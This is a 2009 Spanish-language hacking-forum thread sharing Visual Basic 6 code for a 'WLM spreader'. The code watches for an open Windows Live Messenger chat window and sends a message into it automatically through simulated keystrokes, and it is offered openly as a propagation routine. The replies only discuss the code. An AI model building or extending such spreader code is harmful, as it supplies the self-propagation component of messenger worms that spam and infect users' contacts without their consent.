elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Simple 'WLM' Spreader
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Simple 'WLM' Spreader  (Leído 2,459 veces)
illuminat3d

Desconectado Desconectado

Mensajes: 231



Ver Perfil WWW
Simple 'WLM' Spreader
« en: 18 Noviembre 2009, 17:07 pm »

Bueno ShadeHack me pidió un propagador de msn e hice este muy sencillo =)
Se puede poner otra verificación del caracter '<'

Requerido 1 timer.

Código
  1. Private Declare Function GetWindowText Lib "User32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
  2. Private Declare Function GetForegroundWindow Lib "User32" () As Long
  3. Dim lRet As Long, nWindow As String, Capt As String, Dat() As String
  4.  
  5. Private Sub TM_Timer()
  6. lRet = GetForegroundWindow() ' Obtenemos el handle de la ventana activa
  7. Capt = Space$(1024) ' Creamos un buffer para el titulo de la ventana
  8. nWindow = GetWindowText(lRet, Capt, Len(Capt)) ' Obtenemos la cantidad de carácteres
  9. Capt = Left$(Capt, nWindow) ' Obtenemos el nombre de la ventana
  10.  
  11. If Capt <> "" Then ' Verificamos que en la variable Capt haya datos
  12.  Dat() = Split(Capt, "@") ' Hacemos un split para hacer una 1 verificación
  13.  If UBound(Dat) > 0 Then ' Verificamos si dentro de la matriz Dat() hay datos
  14.   If InStr(1, Dat(1), ">") Then SendKeys ("Hola soy tu menstruación!" & "{ENTER}")  ' Hacemos una 2 verificación para saber si es una ventana de Windows Live Messenger y mandamos el mensaje
  15. End If
  16. End Sub
  17.  
  18.  

Descargar proyecto WLM Spread

Saludos! ;D


« Última modificación: 19 Noviembre 2009, 16:49 pm por Sharki » En línea

Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: Simple 'WLM' Spreader
« Respuesta #1 en: 18 Noviembre 2009, 17:51 pm »

Muy simple, pero util para los que empiecen con APIs :P

Solo una cosa, esta instruccion 'InStr(1, Capt, "@")' no seria necesaria, ya que si haces un Split y no hay ningun '@' el codigo no seguira ;D


En línea

illuminat3d

Desconectado Desconectado

Mensajes: 231



Ver Perfil WWW
Re: Simple 'WLM' Spreader
« Respuesta #2 en: 18 Noviembre 2009, 18:05 pm »

Muy simple, pero util para los que empiecen con APIs :P

Solo una cosa, esta instruccion 'InStr(1, Capt, "@")' no seria necesaria, ya que si haces un Split y no hay ningun '@' el codigo no seguira ;D

Uyy que bobo, cierto se me fue la hoya.   :huh::silbar:

En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Spreader Facebook.
Ingeniería Inversa
Elemental Code 1 5,673 Último mensaje 21 Diciembre 2010, 02:26 am
por MCKSys Argentina
[Spreader] Infectar ejecutables VB.NET « 1 2 »
.NET (C#, VB.NET, ASP)
kub0x 17 11,287 Último mensaje 2 Mayo 2012, 17:14 pm
por Maurice_Lupin
Spreader en pascal[APORTE]
Programación General
WarZ0n3 0 2,133 Último mensaje 15 Abril 2013, 00:10 am
por WarZ0n3
Spreader Crypter [USB Inf3ct] ByRoda
Criptografía
Roda 2 3,512 Último mensaje 10 Junio 2015, 00:13 am
por Roda
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines